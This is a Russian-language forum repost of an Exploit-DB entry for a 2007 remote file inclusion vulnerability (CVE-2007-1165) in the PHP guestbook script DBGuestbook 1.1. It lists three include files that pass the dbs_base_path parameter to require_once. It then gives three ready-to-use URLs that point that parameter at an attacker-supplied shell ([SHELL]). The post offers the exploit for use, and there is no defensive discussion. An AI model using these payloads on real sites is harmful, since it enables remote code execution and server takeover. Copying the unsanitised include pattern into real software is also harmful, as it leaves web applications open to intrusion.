Exploit DBGuestbook 1.1 - 'dbs_base_path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3354
Проверка EDB
  1. Пройдено
Автор
DENVEN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1165
Дата публикации
2007-02-21
Код:
DBGuestBook 1.1
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=2
*****************
ERROR:
 
includes/utils.php                               require_once $dbs_base_path
includes/guestbook.php                           require_once $dbs_base_path
includes/views.php                               require_once $dbs_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]
 
Источник
www.exploit-db.com

Похожие темы